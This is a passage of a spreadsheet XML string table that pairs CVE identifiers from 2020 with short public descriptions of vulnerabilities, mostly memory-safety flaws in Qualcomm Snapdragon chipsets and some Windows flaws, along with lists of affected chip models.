  <si>
    <t>u'Possible buffer overflow in WMA message processing due to integer overflow occurs when processing command received from user space' in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music in APQ8009, APQ8053, APQ8096AU, MDM9206, MDM9250, MDM9628, MDM9640, MDM9650, MSM8996AU, QCS405, SDA845, SDX20, SDX20M, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11132</t>
  </si>
  <si>
    <t>u'Buffer over read in boot due to size check ignored before copying GUID attribute from request to response' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8096AU, APQ8098, MDM8207, MDM9150, MDM9205, MDM9206, MDM9207, MDM9250, MDM9607, MDM9628, MDM9650, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8998, QCM4290, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QSM8250, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA640, SDA670, SDA845, SDA855, SDM1000, SDM640, SDM670, SDM710, SDM712, SDM830, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11133</t>
  </si>
  <si>
    <t>u'Possible out of bound array write in rxdco cal utility due to lack of array bound check' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MSM8998, QCS605, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-11134</t>
  </si>
  <si>
    <t>Possible stack out of bound write might happen due to time bitmap length and bit duration fields of the attributes like NAN ranging setup attribute inside a NAN management frame are not Properly validated in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11135</t>
  </si>
  <si>
    <t>u'Reachable assertion when wrong data size is returned by parser for ape clips' in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8098, Kamorta, MSM8917, MSM8953, Nicobar, QCM2150, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11136</t>
  </si>
  <si>
    <t>Buffer Over-read in audio driver while using malloc management function due to not returning NULL for zero sized memory requirement in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11137</t>
  </si>
  <si>
    <t>Integer multiplication overflow resulting in lower buffer size allocation than expected causes memory access out of bounds resulting in possible device instability in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11138</t>
  </si>
  <si>
    <t>Uninitialized pointers accessed during music play back with incorrect bit stream due to an uninitialized heap memory result in instability in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11139</t>
  </si>
  <si>
    <t>Out of bound memory access while processing frames due to lack of check of invalid frames received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1114</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1087.</t>
  </si>
  <si>
    <t>CVE-2020-11140</t>
  </si>
  <si>
    <t>Out of bound memory access during music playback with ALAC modified content due to improper validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11141</t>
  </si>
  <si>
    <t>u'Buffer over-read issue in Bluetooth estack due to lack of check for invalid length of L2cap configuration request received from peer device.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, SA415M, SA515M, SC8180X, SDX55, SM8250</t>
  </si>
  <si>
    <t>CVE-2020-11143</t>
  </si>
  <si>
    <t>Out of bound memory access during music playback with modified content due to copying data without checking destination buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11144</t>
  </si>
  <si>
    <t>Buffer over-read while UE process invalid DL ROHC packet for decompression due to lack of check of size of compresses packet in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11145</t>
  </si>
  <si>
    <t>Divide by zero issue can happen while updating delta extension header due to improper validation of master SN and extension header SN in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11146</t>
  </si>
  <si>
    <t>Out of bound write while copying data using IOCTL due to lack of check of array index received from user in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11147</t>
  </si>
  <si>
    <t>Use after free issue in audio modules while removing and freeing objects during list iteration due to incorrect usage of macro in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11148</t>
  </si>
  <si>
    <t>Use after free issue in HIDL while using callback to post event in Rx thread when internal mutex is not acquired and meantime close is triggered and callback instance is deleted in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11149</t>
  </si>
  <si>
    <t>Out of bound access due to usage of an out-of-range pointer offset in the camera driver. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1115</t>
  </si>
  <si>
    <t>CVE-2020-11150</t>
  </si>
  <si>
    <t>Out of bound memory access in camera driver due to improper validation on data coming from UMD which is used for offset manipulation of pointer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11151</t>
  </si>
  <si>
    <t>Race condition occurs while calling user space ioctl from two different threads can results to use after free issue in video in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11152</t>
  </si>
  <si>
    <t>Race condition in HAL layer while processing callback objects received from HIDL due to lack of synchronization between accessing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11153</t>
  </si>
  <si>
    <t>u'Out of bound memory access while processing GATT data received due to lack of check of pdu data length and leads to remote code execution' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8053, QCA6390, QCA9379, QCN7605, SC8180X, SDX55</t>
  </si>
  <si>
    <t>CVE-2020-11154</t>
  </si>
  <si>
    <t>u'Buffer overflow while processing a crafted PDU data packet in bluetooth due to lack of check of buffer size before copying' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55</t>
  </si>
  <si>
    <t>CVE-2020-11155</t>
  </si>
  <si>
    <t>u'Buffer overflow while processing PDU packet in bluetooth due to lack of check of buffer length before copying into it.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55</t>
  </si>
  <si>
    <t>CVE-2020-11156</t>
  </si>
  <si>
    <t>u'Buffer over-read issue in Bluetooth estack due to lack of check for invalid length of L2cap packet received from peer device.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in QCA6390, QCN7605, QCS404, SA415M, SA515M, SC8180X, SDX55, SM8250</t>
  </si>
  <si>
    <t>CVE-2020-11157</t>
  </si>
  <si>
    <t>u'Lack of handling unexpected control messages while encryption was in progress can terminate the connection and thus leading to a DoS' in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8053, APQ8076, MDM9640, MDM9650, MSM8905, MSM8917, MSM8937, MSM8940, MSM8953, QCA6174A, QCA9886, QCM2150, QM215, SDM429, SDM439, SDM450, SDM632</t>
  </si>
  <si>
    <t>CVE-2020-11158</t>
  </si>
  <si>
    <t>u'Null pointer dereference in HP OfficeJet Pro 8210 jbig2 filter due to lack of check of PDF font array leads to denial of service' in IPS PDF releases prior to IPS System 2020.2</t>
  </si>
  <si>
    <t>CVE-2020-11159</t>
  </si>
  <si>
    <t>Buffer over-read can happen while processing WPA,RSN IE of beacon and response frames if IE length is less than length of frame pointer being accessed in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1116</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory, aka 'Windows CSRSS Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11160</t>
  </si>
  <si>
    <t>Resource leakage issue during dci client registration due to reference count is not decremented if dci client registration fails in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11161</t>
  </si>
  <si>
    <t>Out-of-bounds memory access can occur while calculating alignment requirements for a negative width from external components in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11162</t>
  </si>
  <si>
    <t>u'Possible buffer overflow in MHI driver due to lack of input parameter validation of EOT events received from MHI device side' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MSM8917, MSM8953, Nicobar, QCA6390, QCM2150, QCS404, QCS405, QCS605, QM215, QRB5165, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM710, SDM845, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11163</t>
  </si>
  <si>
    <t>Possible buffer overflow while updating ikev2 parameters due to lack of check of input validation for certain parameters received from the ePDG server in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11164</t>
  </si>
  <si>
    <t>u'Third-party app may also call the broadcasts in Perfdump and cause privilege escalation issue due to improper access control' in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8909W, MSM8917, MSM8940, Nicobar, QCA6390, QCM2150, QCS605, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429W, SDM450, SDM630, SDM636, SDM660, SDM670, SDM710, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11165</t>
  </si>
  <si>
    <t>Memory corruption due to buffer overflow while copying the message provided by HLOS into buffer without validating the length of buffer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11166</t>
  </si>
  <si>
    <t>Potential out of bound read exception when UE receives unusually large number of padding octets in the beginning of ROHC header in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11167</t>
  </si>
  <si>
    <t>Memory corruption while calculating L2CAP packet length in reassembly logic when remote sends more data than expected in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11168</t>
  </si>
  <si>
    <t>u'Null-pointer dereference can occur while accessing data buffer beyond its size that leads to access the buffer beyond its range' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8053, APQ8064AU, APQ8096AU, APQ8098, MDM9206, MDM9650, MSM8909W, MSM8953, MSM8996AU, QCM4290, QCS405, QCS4290, QCS603, QCS605, QM215, QSM8350, SA6155, SA6155P, SA8155, SA8155P, SDA429W, SDA640, SDA660, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM450, SDM632, SDM640, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11169</t>
  </si>
  <si>
    <t>u'Buffer over-read while processing received L2CAP packet due to lack of integer overflow check' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55</t>
  </si>
  <si>
    <t>CVE-2020-1117</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the Color Management Module (ICM32.dll) handles objects in memory, aka 'Microsoft Color Management Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11170</t>
  </si>
  <si>
    <t>Out of bound memory access while playing music playbacks with crafted vorbis content due to improper checks in header extraction in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11171</t>
  </si>
  <si>
    <t>Buffer over-read can happen while parsing received SDP values due to lack of NULL termination check on SDP in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11172</t>
  </si>
  <si>
    <t>u'fscanf reads a string from a file and stores its contents on a statically allocated stack memory which leads to stack overflow' in Snapdragon Wired Infrastructure and Networking in IPQ4019, IPQ6018, IPQ8064, IPQ8074, QCA9531, QCA9980</t>
  </si>
  <si>
    <t>CVE-2020-11173</t>
  </si>
  <si>
    <t>u'Two threads running simultaneously from user space can lead to race condition in fastRPC driver' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8053, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MSM8953, Nicobar, QCA6390, QCS404, QCS405, QCS610, Rennell, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM632, SDM660, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11174</t>
  </si>
  <si>
    <t>u'Array index underflow issue in adsp driver due to improper check of channel id before used as array index.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8953, MSM8996AU, QCA6390, QCA9531, QCM2150, QCS404, QCS405, QCS605, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11175</t>
  </si>
  <si>
    <t>u'Use after free issue in Bluetooth transport driver when a method in the object is accessed after the object has been deleted due to improper timer handling.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009W, MSM8909W, QCS605, QM215, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA670, SDA855, SDM1000, SDM640, SDM670, SDM710, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6350, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11176</t>
  </si>
  <si>
    <t>While processing server certificate from IPSec server, certificate validation for subject alternative name API can cause heap overflow which can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11177</t>
  </si>
  <si>
    <t>User can overwrite Security Code NV item without knowing current SPC due to improper validation of SPC code setting and device lock in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11178</t>
  </si>
  <si>
    <t>Trusted APPS to overwrite the CPZ memory of another use-case as TZ only checks the physical address not overlapping with its memory and its RoT memory in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11179</t>
  </si>
  <si>
    <t>Arbitrary read and write to kernel addresses by temporarily overwriting ring buffer pointer and creating a race condition. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1118</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in the Windows implementation of Transport Layer Security (TLS) when it improperly handles certain key exchanges, aka 'Microsoft Windows Transport Layer Security Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11180</t>
  </si>
  <si>
    <t>Out of bound access in computer vision control due to improper validation of command length before processing it in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11181</t>
  </si>
  <si>
    <t>Out of bound access issue while handling cvp process control command due to improper validation of buffer pointer received from HLOS in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11182</t>
  </si>
  <si>
    <t>Possible heap overflow while parsing NAL header due to lack of check of length of data received from user in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11183</t>
  </si>
  <si>
    <t>A process can potentially cause a buffer overflow in the display service allowing privilege escalation by executing code as that service in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11184</t>
  </si>
  <si>
    <t>u'Possible buffer overflow will occur in video while parsing mp4 clip with crafted esds atom size.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11185</t>
  </si>
  <si>
    <t>Out of bound issue in WLAN driver while processing vdev responses from firmware due to lack of validation of data received from firmware in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11186</t>
  </si>
  <si>
    <t>Modem will enter into busy mode in an infinite loop while parsing histogram dimension due to improper validation of input received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11187</t>
  </si>
  <si>
    <t>Possible memory corruption in BSI module due to improper validation of parameter count in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11188</t>
  </si>
  <si>
    <t>CVE-2020-11189</t>
  </si>
  <si>
    <t>CVE-2020-1119</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when StartTileData.dll improperly handles objects in memory, aka 'Windows Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11190</t>
  </si>
  <si>
    <t>CVE-2020-11191</t>
  </si>
  <si>
    <t>Out of bound read occurs while processing crafted SDP due to lack of check of null string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t>
  </si>
  <si>
    <t>CVE-2020-11192</t>
  </si>
  <si>
    <t>Out of bound write while parsing SDP string due to missing check on null termination in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11193</t>
  </si>
  <si>
    <t>u'Buffer over read can happen while parsing mkv clip due to improper typecasting of data returned from atomsize' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM9206, MDM9650, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA429W, SDA640, SDA660, SDA670, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11194</t>
  </si>
  <si>
    <t>Possible out of bound access in TA while processing a command from NS side due to improper length check of response buffer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11195</t>
  </si>
  <si>
    <t>Out of bound write and read in TA while processing command from NS side due to improper length check on command and response buffers in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11196</t>
  </si>
  <si>
